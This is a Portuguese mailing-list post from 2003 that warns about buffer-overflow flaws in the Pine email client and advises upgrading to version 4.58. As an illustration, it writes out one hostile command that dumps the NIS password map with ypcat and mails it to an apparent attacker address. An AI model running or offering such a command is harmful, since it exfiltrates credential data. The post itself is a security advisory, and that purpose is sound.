[GUFSC] sim..o pine tem exploit (fwd)
Emerson Ribeiro de Mello
emerson em das.ufsc.br
Sexta Setembro 19 17:36:38 GMT+3 2003
Tah....
o pine nao eh software livre (uma pena, bem que poderia), mas eh um dos
mais utilizados no mundo *nix + modo texto, logo eh bao ficar atento.
http://www.idefense.com/advisory/09.10.03.txt
http://www.washington.edu/pine/
pelo que li, mensagens com cabecalho mal formado pode dar buffer overflow
e ae executar comandos arbritarios.. e outra falha eh na conversao do
corpo externo de uma msg (tipo anexo) que tbm gera buffer overflow.
no site do pine recomendam atualizar para a versao 4.58
Acho ateh importante isso..jah que um email mal formado pode por exemplo
fazer: ypcat das.ufsc.br passwd | mail hacker em oba.com.br
:)
falow,
[]'s
Emerson R. de Mello
+---------------------------------+
| http://www.das.ufsc.br/~emerson |
| |
| Telefone: |
| (48) 331-7576 - UFSC/LCMI |
| |
+---------------------------------+
Mais detalhes sobre a lista de discussão GUFSC